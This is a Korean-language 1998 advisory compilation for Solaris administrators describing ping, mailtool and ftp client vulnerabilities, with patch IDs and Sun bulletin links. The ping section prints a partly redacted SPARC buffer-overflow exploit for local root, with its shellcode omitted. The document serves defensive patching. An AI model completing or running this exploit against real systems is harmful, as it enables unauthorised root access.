13

머리말

이 문서는 Solaris 2.x (2.3~2.6) OS 중 심각한 security 상의 문제를 일으키는 버그들에 대해 상세히 설명했으며, 그 해결책을 제시하고 있다. SunOS 4.x , Solaris 2.0 , Solaris 2.1 , Solaris 2.2 에 해당되는 버그도 있으나 이 부분에 대한 언급은 현재 대부분의 SUN 시스템이 Solaris 2.3 ~ Solaris 2.6 버전을 탑재하고 있음을 반영하여 설명을 생략하였다. 하지만 타 OS 에도 공통으로 존재하는 critical 한 버그의 경우에는 언급을 하였다. 이 문서에서 주로 참고로 삼은 문서는 Sun Security Bulletin 이며 bugtraq 등과 같은 메일링 리스트의 해킹 스크립트, 프로그램과 함께 배포되는 토론내용, 버그에 대한 설명들도 참조하였다.

이 문서는 위의 참고문헌들을 기반으로 삼고 있기 때문에, Solaris 2.x 상에 존재하는 모든 보안상의 문제점을 다룬 것이 아니라는 것을 잊어서는 안된다. 끊임없이 SUN 에서 제공하는 패치들을 부지런히 적용하는 것이 중요하다고 생각한다.

별것 아닌 문서지만 이 문서가 국내 관리자들에게 도움이 되길 바란다.

이 문서에 대한 모든 권리는 글쓴이인 김휘강(sakai@major.kaist.ac.kr) 에 있으며, 글쓴이의 저작권을 명시해 주고, 상업적인 목적에 사용하지 않는 한, 이 글의 일부 혹은 전부를 변형없이 복사, 배포하는 것을 허용합니다.

15. ping (1998/9/9) ; bug id #174

1. 해당 프로그램

ping (1M)

2. 해당 시스템

SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4 , 4.1.3_U1

3. Description of Bugs

ping 은 SunOS 에서 예전에도 심각한 문제를 일으킨 적이 있었던 프로그램이며 setuid root 프로그램이다. ping 은 ICMP 프로토콜의 ECHO_REQUEST 데이터그램을 사용해서 network gateway 나 지정한 host 로부터 ECHO_RESPONSE 가 전송되어 오는지를 체크하여 network gateway 나 host 의 alive 유무를 체크할 수 있다.

이 ping 프로그램에서 buffer overflow 를 일으켜서 로칼유저라면 누구나 root 의 권한을 얻게 될 수 있는 버그가 존재한다.

아래에 첨부한 프로그램은 현재 해커들 사이에서 쓰이고 있는 ping 해킹 프로그램이다. 부작용을 우려해 코드의 일부분을 삭제했다.

#include <sys/types.h>

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#define BUF_LENGTH 8200

#define EXTRA 100

#define STACK_OFFSET 4000

#define SPARC_NOP 0xa61cc013

......................

u_long get_sp(void)

{

__asm__("mov %sp,%i0 \n");

}

void main(int argc, char *argv[])

{

char buf[BUF_LENGTH + EXTRA];

long targ_addr;

u_long *long_p;

u_char *char_p;

int i, code_length = strlen(sparc_shellcode);

long_p = (u_long *) buf;

for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)

*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

for (i = 0; i<code_length; i++)

*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

targ_addr = get_sp() - STACK_OFFSET;

for (i = 0; i<EXTRA / sizeof(u_long); i++)

*long_p++ = targ_addr;

printf("Jumping to address 0x%lx\n", targ_addr);

execl("/usr/sbin/ping", "ping", buf, (char *) 0);

perror("execl failed");

}

4. 해결책 & 패치리스트

SunOS	Patch ID
SunOS 5.6	106448-01
SunOS 5.6_x86	106449-01
SunOS 5.5.1	103699-02
SunOS 5.5.1_x86	103700-02
SunOS 5.5	106446-01
SunOS 5.5_x86	106447-01
SunOS 5.4	106451-01
SunOS 5.4_x86	106452-01
SunOS 5.3	106450-01
SunOS 4.1.4	103297-02
SunOS 4.1.3_U1	106546-01

5. References

관련 어드바이저리

Sun Security Bulletin #174

http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/174

16. mailtool (1998/9/9) ; bugid #175

1. 해당 프로그램

mailtool

2. 해당 시스템

SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4 , 4.1.3_U1

3. Description of Bugs

이 버그는 "CERT Advisory CA-98.10, Buffer Overflow in MIME-aware Mail and News Clients" 어드바이저리에 언급된 것과 마찬가지로 MIME 타입을 처리해 주는 메일클라이언트와 뉴스클라이언트에 존재하는데 , SunOS 의 경우 mailtool , dtmail 에 이 버그가 존재한다.

이 어드바이저리에서는 mailtool 의 경우만 다루어 보기로 하겠다.

mailtool 의 버그는 CA-98.10 과 연관된 것만 있는 것이 아니다. 예전에도 SunOS 5.5에서 vacation 기능을 enable 시킨 경우 심볼릭 링크를 체크하지 않아서 파생되는 문제점도 존재했었다.

mailtool 은 OpenWindows 환경에서 쓰이는 mail client 이다. 이 mailtool 에 buffer overflow 를 일으키는 문제점이 존재한다. 이를 이용하여 해커가 임의의 커맨드를 원격에서 실행시킬 수 있게 되어 시스템을 망가뜨리거나 root 의 권한을 얻는 일이 가능해진다.

참고로 OS 별로 자세히 살펴보면 다음과 같다.

Caldera 사의 OpenLinux

포함된 mutt 프로그램 내에 버그가 존재한다. 아래의 사이트에서 mutt 를 업그레이드 하도록 한다.

ftp://ftp.caldera.com/pub/OpenLinux/updates/1.2/011/mutt-0.93.1-2.i386.rpm

ftp://ftp.caldera.com/pub/OpenLinux/updates/1.2/011/mutt-0.93.1-2.src.rpm

Data General Corporation

DG/UX 에는 문제점이 존재치 않는다.

Fujitsu

Fujitsu 사의 OS 인 UXP/V 에는 문제점이 존재치 않는다.

Hewlett-Packard Company

HP-UX 와 CDE 패키지를 사용하는 경우 CDE 에 포함되어 있는 dtmail 에 문제점이 존재한다. 패치는 현재 개발중이다.

Iris

Lotus Notes 에 문제점이 존재하는지 조사중이다.

Microsoft Corporation

아래의 MS security bulletin 을 참조하기 바란다.

http://www.microsoft.com/security/bulletins/ms98-008.htm

Mutt

mutt 는 free software 이기 때문에 OS 에 관계없이 mutt 를 설치한 호스트에서는 설치된 mutt 의 버전에 따라 문제점이 존재할 수 있다.

Mutt 0.93.1(i) 이하 버전에서는 문제점이 존재한다. 아래의 사이트에서 0.93.2(i) 버전으로 업그레이드 하기 바란다.

ftp://ftp.guug.de/pub/mutt/

문제점이 존재치 않는다.

NetBSD

NetBSD 에서 제공되는 mutt 패키지와 pine 패키지에 버그가 존재한다.

Netscape

아래의 웹사이트를 참조하기 바란다.

http://www.netscape.com/products/security/resources/bugs/longfile.html

OpenBSD

문제점이 존재치 않는다.

Pegasus Mail

Pegasus Mail 에는 문제점이 존재치 않는다.

QUALCOMM Incorporated

Eudora Pro Email, Eudora Pro CommCenter ,Eudora Light 에서는 별 문제점이 없다는 자사의 조사결과가 나왔다.

SCO UNIX

아래의 product 에는 문제점이 존재치 않는다.

SCO CMW+

SCO Open Desktop / Open Server 3.0, SCO UNIX 3.2v4

SCO OpenServer 5, SCO Internet FastStart

SCO UnixWare 2.1

SCO UnixWare 7 의 dtmail 에는 버그가 존재한다. 패치가 될 때까지 mailx 나 Netscape Navigator 를 사용해서 attach 된 메일을 읽기 바란다.

SunOS

CDE 버전 1.0.1, 1.0.2 , 1.2 를 사용하는 경우 dtmail 에 문제점이 존재함

Openwindows 버전 3.0, 3.3, 3.4, 3.5 ,3.6 을 사용하는 경우 mailtool 에 문제점이 존재함.

PINE

최신버전인 4.02 에도 buffer overflow 를 일으킬 수 있는 문제점이 존재한다.

아래의 사이트에서 소스패치를 가져와서 패치를 하거나 4.02A 버전 (패치포함) 으로 업그레이드 하기 바란다.

ftp://ftp.cac.washington.edu/pine/pine4.02A.patch

4. 해결책 & 패치리스트

SunOS

Patch ID

SunOS 5.6

106650-01

106648-01

106649-01

SunOS 5.6_x86

106659-01

106657-01

106658-01

SunOS 5.5.1

104093-05

106662-01

106663-01

SunOS 5.5.1_x86

105127-02

106664-01

106665-01

SunOS 5.5

102839-05

106666-01

106667-01

SunOS 5.5_x86

102840-04

106668-01

106669-01

SunOS 5.4

101880-13

106671-02

106672-02

SunOS 5.4_x86

101892-13

106673-02

106674-02

SunOS 5.3

101605-06

106675-02

106676-02

SunOS 4.1.4

100544-11

106682-01

SunOS 4.1.3_U1

100544-11

106682-01

참고로 패치를 적용할 때 , required 패치가 설치되어야만 한다. 참고로 Solaris 2.5.1 머쉰에서 사전에 필요한 패치를 하지 않고 패치를 실행시켰을 때의 예이다.

Solaris2.5.1_machine# ./installpatch .

Checking installed packages and patches...

ERROR: This patch requires the following patches

which have not been applied to the system:

103566-36 106663-01 106662-01 103901-11

Installpatch is terminating.

5. References

관련 어드바이저리

Sun Security Bulletin #175

http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/175

CERT Advisory CA-98.10

17. ftp (1998/9/30) ; bugid #176

1. 해당 프로그램

ftp

2. 해당 시스템

SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4 , 4.1.3_U1

3. Description of Bugs

A vulnerability has been discovered in ftp client software whereby a malicious ftp server can trick the ftp client into executing arbitrary commands.

고의적으로 ftp server 에서 ftp client 가 임의의 커맨드를 실행시킬 수 있도록 조작할 수 있는 문제점이 ftp client 소프트웨어에서 발견되었다.

4. 해결책 & 패치리스트

SunOS	Patch ID
SunOS 5.6	106522-01
SunOS 5.6_x86	106523-01
SunOS 5.5.1	103603-09
SunOS 5.5.1_x86	103604-09
SunOS 5.5	103577-09
SunOS 5.5_x86	103578-09
SunOS 5.4	101945-60 (9 주 이내에 배포될 예정 )
SunOS 5.4_x86	101946-53 (9 주 이내에 배포될 예정)
SunOS 5.3	101653-02
SunOS 4.1.4	104477-04
SunOS 4.1.3_U1	104454-04

5. References

Sun Security Bulletin #176

http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/176